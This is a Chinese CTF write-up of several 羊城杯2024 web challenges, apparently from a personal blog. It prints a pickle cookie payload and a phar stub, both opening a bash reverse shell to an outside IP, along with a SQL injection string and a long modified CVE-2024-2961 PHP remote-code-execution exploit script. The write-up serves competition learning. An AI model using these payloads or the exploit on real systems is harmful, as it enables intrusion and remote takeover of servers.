目录

  1. 1. 前言
  2. 2. I have wrote some lyrics for you……
  3. 3. ez_java(Unsolved)
  4. 4. 网络照相馆(复现)
    1. 4.1. 预期
    2. 4.2. 非预期
  5. 5. tomcom2

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

羊城杯2024

2024/8/27 CTF线上赛 反序列化 SSRF
  |     |   总文章阅读量:

前言

参考:

https://mp.weixin.qq.com/s/3C0vRu8Mtaj4tzOsj4lY_g


I have wrote some lyrics for you……

进去是一个任意文件读取:/lyrics?lyrics=

先读 /proc/self/cmdline :得到运行路径python3 -u /usr/etc/app/app.py

读下来

import os
import random

from config.secret_key import secret_code
from flask import Flask, make_response, request, render_template
from cookie import set_cookie, cookie_check, get_cookie
import pickle

app = Flask(__name__)
app.secret_key = random.randbytes(16)


class UserData:
    def __init__(self, username):
        self.username = username


def Waf(data):
    blacklist = [b'R', b'secret', b'eval', b'file', b'compile', b'open', b'os.popen']
    valid = False
    for word in blacklist:
        if word.lower() in data.lower():
            valid = True
            break
    return valid


@app.route("/", methods=['GET'])
def index():
    return render_template('index.html')


@app.route("/lyrics", methods=['GET'])
def lyrics():
    resp = make_response()
    resp.headers["Content-Type"] = 'text/plain; charset=UTF-8'
    query = request.args.get("lyrics")
    path = os.path.join(os.getcwd() + "/lyrics", query)

    try:
        with open(path) as f:
            res = f.read()
    except Exception as e:
        return "No lyrics found"
    return res


@app.route("/login", methods=['POST', 'GET'])
def login():
    if request.method == 'POST':
        username = request.form["username"]
        user = UserData(username)
        res = {"username": user.username}
        return set_cookie("user", res, secret=secret_code)
    return render_template('login.html')


@app.route("/board", methods=['GET'])
def board():
    invalid = cookie_check("user", secret=secret_code)
    if invalid:
        return "Nope, invalid code get out!"

    data = get_cookie("user", secret=secret_code)

    if isinstance(data, bytes):
        a = pickle.loads(data)
        data = str(data, encoding="utf-8")

    if "username" not in data:
        return render_template('user.html', name="guest")
    if data["username"] == "admin":
        return render_template('admin.html', name=data["username"])
    if data["username"] != "admin":
        return render_template('user.html', name=data["username"])


if __name__ == "__main__":
    os.chdir(os.path.dirname(__file__))
    app.run(host="0.0.0.0", port=8080)

逻辑很清晰,先登录,然后是pickle反序列化

把相关的模块也读出来

/usr/etc/app/cookie.py

import base64
import hashlib
import hmac
import pickle

from flask import make_response, request

unicode = str
basestring = str


# Quoted from python bottle template, thanks :D

def cookie_encode(data, key):
    msg = base64.b64encode(pickle.dumps(data, -1))
    sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())
    return tob('!') + sig + tob('?') + msg


def cookie_decode(data, key):
    data = tob(data)
    if cookie_is_encoded(data):
        sig, msg = data.split(tob('?'), 1)
        if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())):
            return pickle.loads(base64.b64decode(msg))
    return None


def waf(data):
    blacklist = [b'R', b'secret', b'eval', b'file', b'compile', b'open', b'os.popen']
    valid = False
    for word in blacklist:
        if word in data:
            valid = True
            # print(word)
            break
    return valid


def cookie_check(key, secret=None):
    a = request.cookies.get(key)
    data = tob(request.cookies.get(key))
    if data:
        if cookie_is_encoded(data):
            sig, msg = data.split(tob('?'), 1)
            if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(secret), msg, digestmod=hashlib.md5).digest())):
                res = base64.b64decode(msg)
                if waf(res):
                    return True
                else:
                    return False
        return True
    else:
        return False


def tob(s, enc='utf8'):
    return s.encode(enc) if isinstance(s, unicode) else bytes(s)


def get_cookie(key, default=None, secret=None):
    value = request.cookies.get(key)
    if secret and value:
        dec = cookie_decode(value, secret)
        return dec[1] if dec and dec[0] == key else default
    return value or default


def cookie_is_encoded(data):
    return bool(data.startswith(tob('!')) and tob('?') in data)


def _lscmp(a, b):
    return not sum(0 if x == y else 1 for x, y in zip(a, b)) and len(a) == len(b)


def set_cookie(name, value, secret=None, **options):
    if secret:
        value = touni(cookie_encode((name, value), secret))
        resp = make_response("success")
        resp.set_cookie("user", value, max_age=3600)
        return resp
    elif not isinstance(value, basestring):
        raise TypeError('Secret key missing for non-string Cookie.')

    if len(value) > 4096:
        raise ValueError('Cookie value to long.')


def touni(s, enc='utf8', err='strict'):
    return s.decode(enc, err) if isinstance(s, bytes) else unicode(s)

/usr/etc/app/config/secret_key.py

secret_code = "EnjoyThePlayTime123456" 

然后开始审代码,我们的目标是

invalid = cookie_check("user", secret=secret_code)
if invalid:
    return "Nope, invalid code get out!"

data = get_cookie("user", secret=secret_code)

if isinstance(data, bytes):
    a = pickle.loads(data)
    data = str(data, encoding="utf-8")

跟进cookie_check

def waf(data):
    blacklist = [b'R', b'secret', b'eval', b'file', b'compile', b'open', b'os.popen']
    valid = False
    for word in blacklist:
        if word in data:
            valid = True
            print(word)
            break
    return valid


def cookie_check(key, secret=None):
    a = request.cookies.get(key)
    data = tob(request.cookies.get(key))
    if data:
        if cookie_is_encoded(data):
            sig, msg = data.split(tob('?'), 1)
            if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(secret), msg, digestmod=hashlib.md5).digest())):
                res = base64.b64decode(msg)
                if waf(res):
                    return True
                else:
                    return False
        return True
    else:
        return False

ban了R指令,用o指令随便绕,然后审计一圈下来可知下面的cookie_check用于检测是否是set_cookie产生的cookie

那就依样画葫芦生成一个

from cookie import cookie_encode
from config.secret_key import secret_code

opcode=b'''(cos
system
S'bash -c "bash -i >& /dev/tcp/115.236.153.177/30908 <&1"'
o.'''

a=opcode
print(cookie_encode(("user",opcode),secret_code))

生成的 cookie 直接传入 /board 路由弹shell

image-20240827112051806


ez_java(Unsolved)

审审代码

import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;

@Controller
public class IndexControler {
    public IndexControler() {
    }

    @RequestMapping({"/doLogin"})
    public String createSql(@RequestParam("username") String username, @RequestParam("password") String password) throws Exception {
        Subject subject = SecurityUtils.getSubject();

        try {
            subject.login(new UsernamePasswordToken(username, password));
            return "forward:/user/index";
        } catch (AuthenticationException var5) {
            return "forward:/login";
        }
    }

    @RequestMapping({"/wrong"})
    @ResponseBody
    public String error() {
        return "wrong";
    }

    @RequestMapping({"/login"})
    public String login() {
        return "login";
    }
}

登录接口

image-20240828084825553

这里给了账密可以登录进去

import com.example.ycbjava.utils.MyObjectInputStream;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.OpenOption;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Base64;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.multipart.MultipartFile;

@Controller
public class UserControler {
    public UserControler() {
    }

    @RequestMapping({"/user/index"})
    public String index() {
        return "index";
    }

    @PostMapping({"/user/ser"})
    @ResponseBody
    public String ser(@RequestParam("ser") String ser) throws IOException, ClassNotFoundException {
        byte[] decode = Base64.getDecoder().decode(ser);
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        byteArrayOutputStream.write(decode);
        MyObjectInputStream objectInputStream = new MyObjectInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()));
        objectInputStream.readObject();
        return "Success";
    }

    @PostMapping({"/user/upload"})
    @ResponseBody
    public String handleFileUpload(MultipartFile file) {
        if (file.isEmpty()) {
            return "File upload failed";
        } else {
            try {
                String fileName = file.getOriginalFilename();
                int index = fileName.lastIndexOf(".");
                if (!fileName.contains("../") && !fileName.contains("..\\")) {
                    String suffix = fileName.substring(index);
                    if (suffix.equals(".jsp")) {
                        return "File upload failed";
                    } else {
                        byte[] bytes = file.getBytes();
                        Path path = Paths.get("/templates/" + fileName);
                        Files.write(path, bytes, new OpenOption[0]);
                        return "File upload success";
                    }
                } else {
                    return "File upload failed";
                }
            } catch (Exception var7) {
                var7.printStackTrace();
                return "File upload failed";
            }
        }
    }
}

反序列化和文件上传的功能

看一下utils

package com.example.ycbjava.utils;

import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;

public class MyObjectInputStream extends ObjectInputStream {
    private static final String[] blacklist = new String[]{"java.lang.Runtime", "java.lang.ProcessBuilder", "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", "java.security.SignedObject", "com.sun.jndi.ldap.LdapAttribute", "org.apache.commons.beanutils", "org.apache.commons.collections", "javax.management.BadAttributeValueExpException", "com.sun.org.apache.xpath.internal.objects.XString"};

    public MyObjectInputStream(InputStream inputStream) throws IOException {
        super(inputStream);
    }

    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String className = desc.getName();
        String[] var3 = blacklist;
        String[] var4 = var3;
        int var5 = var3.length;

        for(int var6 = 0; var6 < var5; ++var6) {
            String forbiddenPackage = var4[var6];
            if (className.startsWith(forbiddenPackage)) {
                throw new InvalidClassException("Unauthorized deserialization attempt", className);
            }
        }

        return super.resolveClass(desc);
    }
}

看一眼blacklist

而在 user 中有

public String getGift() {
    String gift = this.username;
    gift = gift.trim();
    gift = gift.toLowerCase();
    if (gift.startsWith("http") || gift.startsWith("file")) {
        gift = "nonono";
    }

    try {
        URL url1 = new URL(gift);
        Class<?> URLclass = Class.forName("java.net.URLClassLoader");
        Method add = URLclass.getDeclaredMethod("addURL", URL.class);
        add.setAccessible(true);
        URLClassLoader classloader = (URLClassLoader)ClassLoader.getSystemClassLoader();
        add.invoke(classloader, url1);
    } catch (Exception var6) {
        var6.printStackTrace();
    }

    return gift;
}

前缀检测这里翻一下 java.net.URL,发现可以用url:绕过

image-20240828092235138


网络照相馆(复现)

SSRF + sql注入 + CVE-2024-2961

file协议可以读取文件:file://localhost/var/www/html/url.php

<?php
//error_reporting(0);
include_once 'function.php';
include_once 'sql.php';

$baseDir = "data/";

if(isset($_POST['url']))
{
    $url = $_POST['url'];
    $parse = parse_url($url);
    if(!isset($parse['host']))
    {
        die("url错误!");
    }
    $data = curl($url);
    $filename = $baseDir .  get_filename(8);
    file_put_contents($filename , $data);
    if (check($conn, $filename, $url)){
        file_put_contents($filename , $data);
        $sql = "INSERT INTO `data`(`url`,`filename`) VALUES (?, ?)";
        if($stmt = mysqli_prepare($conn, $sql)){
            mysqli_stmt_bind_param($stmt, "ss", $url, $filename);
            mysqli_stmt_execute($stmt);
        }
    }
    else{
        unlink($filename);
    }
    echo $data;
}
?>

function.php

<?php

function curl($url){
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $tmpInfo = curl_exec($curl);
    curl_close($curl);
    return $tmpInfo; 
}

function get_filename($len){
    $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    $var_size = strlen($chars);
    $res = '';
    for( $x = 0; $x < $len; $x++ ) {
        $random_str= $chars[ rand( 0, $var_size - 1 ) ];
        $res .= $random_str;
    }
    $res = date("Y-m-d"). '_' . $res . '.txt';
    return $res;
}

function check($conn , $filename, $url){
    $sql = "SELECT filename from data where url = '$url'";
    $result = $conn->query($sql);
    if ($result) {
        $row = mysqli_fetch_all($result);
        foreach ( $row as $value){
            if( hash_file('md5', $filename) === hash_file('md5', $value[0])){
                return false;
            }
        }
    }
    return true;
}

sql.php

<?php
$servername = "localhost";
$username = "ctfer";
$password = "ctfer";

// 创建连接
$conn = new mysqli($servername, $username, $password,"data");

// 检测连接
if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}

?>

注意到check函数中

$sql = "SELECT filename from data where url = '$url'";
$result = $conn->query($sql);

可以注入

爆字段:

http://127.0.0.1/'union select group_concat(filename,'--',url) from data#

image-20240827165222255

读取权限

union select @@secure_file_priv

image-20240827171017825

但是试了半天并不能写入shell

hint:或许可以关注一下hash_file函数

那么重新整理一下我们掌握的信息,我们可以控制写入文件路径的内容,而且可以知道对应文件路径的位置,但是文件的后缀固定为txt

我们知道phar://是无视后缀的,那么控制filename为phar://xxx.txt即可,在我们的vps上准备phar包

<?php
$payload = '<?php system("bash -c \'bash -i >& /dev/tcp/115.236.153.177/30908 <&1\'"); ?>'; //一句话木马
@unlink('2.phar');
$phar = new Phar("3.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->addFromString("exp.php", "$payload"); //添加要压缩的文件
// $phar->setMetadata(...); //在metadata添加内容,可参考 phar反序列化,此处用不着,故注释
$phar->stopBuffering();

让靶机curl,从而上传phar包

然后利用sql注入获取路径

image-20240827205230975

获取路径:data/2024-08-27_zspCkaDq.txt

然后再构造sql注入文件名phar://data/2024-08-27_zspCkaDq.txt/exp.php

http://127.0.0.1/'union select "phar://data/2024-08-27_zspCkaDq.txt/exp.php"#

但是突然想起来php8后Phar中的元信息不再自动进行反序列化了,寄

预期

后面想了想应该可以打CVE-2024-2961,我们需要手动获取 /proc/self/maps 和 libc.so,然后生成 path 来打

流程是:

先读取 /proc/self/maps

file://localhost/proc/self/maps

把读取到的内容dump下来(懒得写py脚本匹配了)

然后爆改cve-2024-2961的脚本,先打印出 libc.path 得到 libc 的路径,再把 libc.so.6 dump 下来,填进 LIBC_FILE ,然后再跑一次脚本

from __future__ import annotations

import base64
import zlib
from dataclasses import dataclass

from pwn import *
from requests.exceptions import ChunkedEncodingError, ConnectionError
from ten import *


HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")


class Remote:
    
    def __init__(self, url: str) -> None:
        self.url = url
        self.session = Session()
    
    def send(self, path: str) -> Response:
        """Sends given `path` to the HTTP server. Returns the response.
        """
        #print(path)
        return self.session.post(self.url, data={"url": "http://127.0.0.1/'union select\""+path+"\"#"})
        
    def download(self, path: str) -> bytes:
        """Returns the contents of a remote file.
        """
        path = f"php://filter/convert.base64-encode/resource={path}"
        response = self.send(path)
        #print(response.text)
        data = response.re.search(b"File contents: (.*)", flags=re.S).group(1)
        return base64.decode(data)

@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep_time", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
    "pad",
    "Number of 0x100 chunks to pad with. If the website makes a lot of heap "
    "operations with this size, increase this. Defaults to 20.",
)
@dataclass
class Exploit:
    """CNEXT exploit: RCE using a file read primitive in PHP."""

    url: str
    command: str
    sleep: int = 1
    heap: str = None
    pad: int = 20
    
    def __post_init__(self):
        self.remote = Remote(self.url)
        self.log = logger("EXPLOIT")
        self.info = {}
        self.heap = self.heap and int(self.heap, 16)
    
    def check_vulnerable(self) -> None:
        """Checks whether the target is reachable and properly allows for the various
        wrappers and filters that the exploit needs.
        """
        
        def safe_download(path: str) -> bytes:
            try:
                return self.remote.download(path)
            except ConnectionError:
                failure("Target not [b]reachable[/] ?")


        def check_token(text: str, path: str) -> bool:
            result = safe_download(path)
            return text.encode() == result
    
        text = tf.random.string(50).encode()
        base64 = b64(text, misalign=True).decode()
        path = f"data:text/plain;base64,{base64}"
        
        result = safe_download(path)
        
        if text not in result:
            msg_failure("Remote.download did not return the test string")
            print("--------------------")
            print(f"Expected test string: {text}")
            print(f"Got: {result}")
            print("--------------------")
            failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")
    
        msg_info("The [i]data://[/] wrapper works")
    
        text = tf.random.string(50)
        base64 = b64(text.encode(), misalign=True).decode()
        path = f"php://filter//resource=data:text/plain;base64,{base64}"
        if not check_token(text, path):
            failure("The [i]php://filter/[/] wrapper does not work")
    
        msg_info("The [i]php://filter/[/] wrapper works")
    
        text = tf.random.string(50)
        base64 = b64(compress(text.encode()), misalign=True).decode()
        path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"
    
        if not check_token(text, path):
            failure("The [i]zlib[/] extension is not enabled")
    
        msg_info("The [i]zlib[/] extension is enabled")
    
        msg_success("Exploit preconditions are satisfied")
    
    def get_file(self, path: str) -> bytes:
        with msg_status(f"Downloading [i]{path}[/]..."):
            return self.remote.download(path)
    
    def get_regions(self) -> list[Region]:
        """Obtains the memory regions of the PHP process by querying /proc/self/maps."""
        with open("download_maps", "r") as file:
            maps = file.read()
        #maps = maps.decode()
        #print(maps)
        PATTERN = re.compile(
            r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
        )
        regions = []
        for region in table.split(maps, strip=True):
            if match := PATTERN.match(region):
                start = int(match.group(1), 16)
                stop = int(match.group(2), 16)
                permissions = match.group(3)
                path = match.group(4)
                if "/" in path or "[" in path:
                    path = path.rsplit(" ", 1)[-1]
                else:
                    path = ""
                current = Region(start, stop, permissions, path)
                regions.append(current)
            else:
                print(maps)
                failure("Unable to parse memory mappings")
    
        self.log.info(f"Got {len(regions)} memory regions")
        #print(regions)
        return regions
    
    def get_symbols_and_addresses(self) -> None:
        """Obtains useful symbols and addresses from the file read primitive."""
        regions = self.get_regions()
    
        LIBC_FILE = "dump_libc" # 自行dump,建议用base64伪协议读取下来避免出现损坏
        # PHP's heap
    
        self.info["heap"] = self.heap or self.find_main_heap(regions)
        print(self.info["heap"])
        # Libc
    
        libc = self._get_region(regions, "libc-", "libc.so")
        print(libc.path)
    
        #self.download_file(libc.path, LIBC_FILE)
        
        self.info["libc"] = ELF(LIBC_FILE, checksec=False)
        self.info["libc"].address = libc.start
    
    def _get_region(self, regions: list[Region], *names: str) -> Region:
        """Returns the first region whose name matches one of the given names."""
        for region in regions:
            if any(name in region.path for name in names):
                break
        else:
            failure("Unable to locate region")
    
        return region
    
    def download_file(self, remote_path: str, local_path: str) -> None:
        """Downloads `remote_path` to `local_path`"""
        data = self.get_file(remote_path)
        Path(local_path).write(data)
    
    def find_main_heap(self, regions: list[Region]) -> Region:
        # Any anonymous RW region with a size superior to the base heap size is a
        # candidate. The heap is at the bottom of the region.
        heaps = [
            region.stop - HEAP_SIZE + 0x40
            for region in reversed(regions)
            if region.permissions == "rw-p"
            and region.size >= HEAP_SIZE
            and region.stop & (HEAP_SIZE-1) == 0
            and region.path == ""
        ]
    
        if not heaps:
            failure("Unable to find PHP's main heap in memory")
    
        first = heaps[0]
    
        if len(heaps) > 1:
            heaps = ", ".join(map(hex, heaps))
            msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
        else:
            msg_info(f"Using [i]{hex(first)}[/] as heap")
    
        return first
    
    def run(self) -> None:
        #self.check_vulnerable()
        self.get_symbols_and_addresses()
        self.exploit()
    
    def build_exploit_path(self) -> str:

        LIBC = self.info["libc"]
        ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
        ADDR_EFREE = LIBC.symbols["__libc_system"]
        ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
    
        ADDR_HEAP = self.info["heap"]
        ADDR_FREE_SLOT = ADDR_HEAP + 0x20
        ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
    
        ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
    
        CS = 0x100
    
        # Pad needs to stay at size 0x100 at every step
        pad_size = CS - 0x18
        pad = b"\x00" * pad_size
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = compressed_bucket(pad)
    
        step1_size = 1
        step1 = b"\x00" * step1_size
        step1 = chunked_chunk(step1)
        step1 = chunked_chunk(step1)
        step1 = chunked_chunk(step1, CS)
        step1 = compressed_bucket(step1)
    
        # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
        # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"
    
        step2_size = 0x48
        step2 = b"\x00" * (step2_size + 8)
        step2 = chunked_chunk(step2, CS)
        step2 = chunked_chunk(step2)
        step2 = compressed_bucket(step2)
    
        step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
        step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
        step2_write_ptr = chunked_chunk(step2_write_ptr)
        step2_write_ptr = compressed_bucket(step2_write_ptr)
    
        step3_size = CS
    
        step3 = b"\x00" * step3_size
        assert len(step3) == CS
        step3 = chunked_chunk(step3)
        step3 = chunked_chunk(step3)
        step3 = chunked_chunk(step3)
        step3 = compressed_bucket(step3)
    
        step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
        assert len(step3_overflow) == CS
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = compressed_bucket(step3_overflow)
    
        step4_size = CS
        step4 = b"=00" + b"\x00" * (step4_size - 1)
        step4 = chunked_chunk(step4)
        step4 = chunked_chunk(step4)
        step4 = chunked_chunk(step4)
        step4 = compressed_bucket(step4)
    
        # This chunk will eventually overwrite mm_heap->free_slot
        # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
        step4_pwn = ptr_bucket(
            0x200000,
            0,
            # free_slot
            0,
            0,
            ADDR_CUSTOM_HEAP,  # 0x18
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            ADDR_HEAP,  # 0x140
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            size=CS,
        )
    
        step4_custom_heap = ptr_bucket(
            ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
        )
    
        step4_use_custom_heap_size = 0x140
    
        COMMAND = self.command
        COMMAND = f"kill -9 $PPID; {COMMAND}"
        if self.sleep:
            COMMAND = f"sleep {self.sleep}; {COMMAND}"
        COMMAND = COMMAND.encode() + b"\x00"
    
        assert (
            len(COMMAND) <= step4_use_custom_heap_size
        ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
        COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")
    
        step4_use_custom_heap = COMMAND
        step4_use_custom_heap = qpe(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)
    
        pages = (
            step4 * 3
            + step4_pwn
            + step4_custom_heap
            + step4_use_custom_heap
            + step3_overflow
            + pad * self.pad
            + step1 * 3
            + step2_write_ptr
            + step2 * 2
        )
    
        resource = compress(compress(pages))
        resource = b64(resource)
        resource = f"data:text/plain;base64,{resource.decode()}"
    
        filters = [
            # Create buckets
            "zlib.inflate",
            "zlib.inflate",
            
            # Step 0: Setup heap
            "dechunk",
            "convert.iconv.latin1.latin1",
            
            # Step 1: Reverse FL order
            "dechunk",
            "convert.iconv.latin1.latin1",
            
            # Step 2: Put fake pointer and make FL order back to normal
            "dechunk",
            "convert.iconv.latin1.latin1",
            
            # Step 3: Trigger overflow
            "dechunk",
            "convert.iconv.UTF-8.ISO-2022-CN-EXT",
            
            # Step 4: Allocate at arbitrary address and change zend_mm_heap
            "convert.quoted-printable-decode",
            "convert.iconv.latin1.latin1",
        ]
        filters = "|".join(filters)
        path = f"php://filter/read={filters}/resource={resource}"
    
        return path
    
    @inform("Triggering...")
    def exploit(self) -> None:
        path = self.build_exploit_path()
        start = time.time()
    
        try:
            self.remote.send(path)
        except (ConnectionError, ChunkedEncodingError):
            pass
        
        msg_print()
        
        if not self.sleep:
            msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")
        elif start + self.sleep <= time.time():
            msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")
        else:
            # Wrong heap, maybe? If the exploited suggested others, use them!
            msg_print("    [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")
        
        msg_print()


def compress(data) -> bytes:
    """Returns data suitable for `zlib.inflate`.
    """
    # Remove 2-byte header and 4-byte checksum
    return zlib.compress(data, 9)[2:-4]


def b64(data: bytes, misalign=True) -> bytes:
    payload = base64.encode(data)
    if not misalign and payload.endswith("="):
        raise ValueError(f"Misaligned: {data}")
    return payload.encode()


def compressed_bucket(data: bytes) -> bytes:
    """Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
    return chunked_chunk(data, 0x8000)


def qpe(data: bytes) -> bytes:
    """Emulates quoted-printable-encode.
    """
    return "".join(f"={x:02x}" for x in data).upper().encode()


def ptr_bucket(*ptrs, size=None) -> bytes:
    """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
    if size is not None:
        assert len(ptrs) * 8 == size
    bucket = b"".join(map(p64, ptrs))
    bucket = qpe(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = compressed_bucket(bucket)

    return bucket


def chunked_chunk(data: bytes, size: int = None) -> bytes:
    """Constructs a chunked representation of the given chunk. If size is given, the
    chunked representation has size `size`.
    For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
    """
    # The caller does not care about the size: let's just add 8, which is more than
    # enough
    if size is None:
        size = len(data) + 8
    keep = len(data) + len(b"\n\n")
    size = f"{len(data):x}".rjust(size - keep, "0")
    return size.encode() + b"\n" + data + b"\n"


@dataclass
class Region:
    """A memory region."""

    start: int
    stop: int
    permissions: str
    path: str
    
    @property
    def size(self) -> int:
        return self.stop - self.start


Exploit()

由于本人的脚本功力实在是烂,改完后的脚本其实应该有不少小问题,但大致思路就是这样,运行之后就写shell了

可惜靶机关了,我也懒得起一个配置好的lamp服务(

非预期

逆天了,怎么有人能爆出flag路径的:file://localhost/ffffffllllllaaaaagggggggg


tomcom2